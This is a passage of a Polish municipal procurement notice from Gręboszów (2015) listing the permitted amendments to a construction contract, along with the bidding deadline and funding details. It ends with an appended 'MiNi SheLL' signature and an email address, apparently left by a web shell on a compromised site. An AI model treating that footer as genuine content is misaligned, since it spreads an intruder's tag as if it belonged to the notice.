      Pzp na warunkach określonych w SIWZ za zgodą obu  stron wyrażoną na   piśmie.  
2.   Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty,  na podstawie której dokonano wyboru Wykonawcy, w przypadku:
      1) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu 
    zamówienia lub świadczenia Stron;
      2) zmiany terminu realizacji umowy;
          a) w przypadku wystąpienia okoliczności wynikających z siły wyższej (np. powodzie, huragany, gwałtowne burze 
        itp. warunki pogodowe), uniemożliwiające realizację robót. Wstrzymanie z tego powodu musi być potwierdzone
              w dzienniku budowy i zaakceptowane przez inspektora nadzoru,
          b) przyczyny zewnętrzne niezależne od  Zamawiającego oraz Wykonawcy skutkujące   niemożliwością prowadzenia 
              prac, np.: będące następstwem działania organów administracji,   wstrzymanie prac budowlanych  przez właściwy 
              organ, opóźnienia związane z uzyskiwaniem przez  Wykonawcę lub Zamawiającego  niezbędnych w myśl ustawy 
              Prawo budowlane dokumentów,
         c)   innymi okolicznościami nie powstałymi  z winy Wykonawcy lub koniecznością wykonania  dodatkowych 
               i niemożliwych do przewidzenia robót,
         W przypadku wystąpienia którejkolwiek z okoliczności wyżej wymienionych, termin wykonania  umowy może  ulec 
         odpowiedniemu przedłużeniu o czas niezbędny do zakończenia przedmiotu zamówienia,  nie dłużej jednak niż o okres 
         trwania tych okoliczności.
3)   Zmiana sposobu spełniania świadczenia;
 a)  Zamawiający  dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu umowy konieczności 
      wykonania robót zamiennych w stosunku do przewidzianych dokumentacja projektową, w sytuacji gdy 
      wykonanie tych robót będzie niezbędne dla prawidłowego, tj. zgodnego z zasadami wiedzy technicznej
      i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu umowy.
 b)  Zamawiający dopuszcza wprowadzenie zamiany materiałów i urządzeń przedstawionych w ofercie przetargowej,  
       pod warunkiem, że zmiany te będą  korzystne  dla Zamawiającego. Będą to, przykładowo,  okoliczności:
      - powodujące obniżenie kosztu ponoszonego przez zamawiającego na eksploatacje i konserwacje  wykonanego  
        przedmiotu umowy,
      - powodujące poprawienie parametrów technicznych,
      - wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących  przepisów.
      Dodatkowo możliwa jest  zmiana producenta poszczególnych materiałów i urządzeń przedstawionych 
      w ofercie przetargowej, pod  warunkiem, że zmiana ta nie spowoduje obniżenia parametrów tych  materiałów
      lub urządzeń.
c)   Ustala się, że wszelkie roboty zamienne, dodatkowe,  będą wykonywane przy zachowaniu nie pogorszonych norm, 
       standardów   i parametrów,  a Zamawiający nie może ponieść ryzyka zwiększenia wynagrodzenia z tytułu  takich  
      zmian.
d)   Przewiduje się także możliwość ograniczenia zakresu rzeczowego przedmiotu umowy (roboty zaniechane),    
      w sytuacji gdy wykonanie danych robót będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy 
      technicznej i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu umowy.
      W takim  przypadku  wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym  Zamawiający 
      zapłaci za   wykonane  roboty, które Wykonawca wykonał w oparciu o bazę cen z przetargu, po przedłożeniu 
      zaakceptowanego kosztorysu  różnicowego.

   4)   Zmiany osobowe;
a)   Zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej 
      równoważnymi uprawnieniami i kwalifikacjami, o których mowa  w ustawie Prawo budowlane lub innych 
      ustawach, 
b)  Zmiana podwykonawców, pod warunkiem wyrażenia zgody Zamawiającego na taką zmianę oraz  spełnienie  przez 
      nowego Podwykonawcę takich samych warunków jak Podwykonawca pierwotny.
 c)  Zmiana inspektora nadzoru lub przedstawicieli ze strony Zamawiającego do realizacji umowy.
5)   Pozostałe zmiany;
 a) Zmiana stawki podatku od towarów i usług VAT związana  ze zmianą obowiązujących przepisów  prawa.
      W takim przypadku Zamawiający dopuszcza  możliwość odpowiednio zwiększenia lub zmniejszenia wynagrodzenia 
      o kwotę równą różnicy w kwocie podatku VAT płaconego przez wykonawcę. 
  b) rezygnacja przez zamawiającego z realizacji części przedmiotu umowy - w takim przypadku wynagrodzenie       
      przysługujące wykonawcy zostanie odpowiednio pomniejszone. W takim przypadku Zamawiający zastrzega  sobie 
      prawo zmiany umowy poprzez sprecyzowanie rzeczywistego końcowego wynagrodzenia.
  c) zmiana umożliwiająca usunięcie rozbieżności  lub niejasności w rozumieniu pojęć użytych  w umowie w celu jej 
      doprecyzowania i   jednoznacznej interpretacji  jej zapisów przez strony,    
  d) zaistnienia innych niemożliwych do przewidzenia w momencie zawarcia umowy okoliczności prawnej, ekonomicznej 
      lub technicznej,   za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem  możliwości należytego 
      wykonania umowy, zgodnie ze SIWZ - Zamawiający  dopuszcza możliwość zmiany  umowy, w szczególności 
      terminu realizacji zamówienia umowy. 
3.  W razie wątpliwości, przyjmuje się, że nie wymagają zmiany Umowy następujące zmiany:
     1) danych związanych obsługą administracyjno - organizacyjną Umowy,
     2) danych adresowych,
     3) danych rejestrowych,     
4.   Warunkiem wprowadzenia zmian do niniejszej umowy jest potwierdzenie powstania okoliczności w formie opisowej
      i właściwie zaakceptowanej przez obie strony umowy oraz sporządzenie pisemnego aneksu podpisanego przez strony 
      umowy pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.malopolska.pl/uggreboszow/Article/id,277574.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gręboszów, pokój nr 2 lub za zaliczeniem pocztowym, po uprzednim złożeniu wniosku, nie później niż 6 dni przed terminem składania..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2015 godzina 10:00, miejsce: Urząd Gminy Gręboszów, Gręboszów 144, 33-260 Gręboszów, pokój nr 11 (piętro) w sekretariacie Urzędu...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie to jest współfinansowane ze środków Województwa Małopolskiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com